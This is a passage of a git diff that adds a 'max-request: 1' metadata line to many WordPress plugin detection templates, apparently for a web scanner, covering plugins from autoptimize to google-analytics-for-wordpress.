max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 58d5c881d0..3d0073b5a5 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml 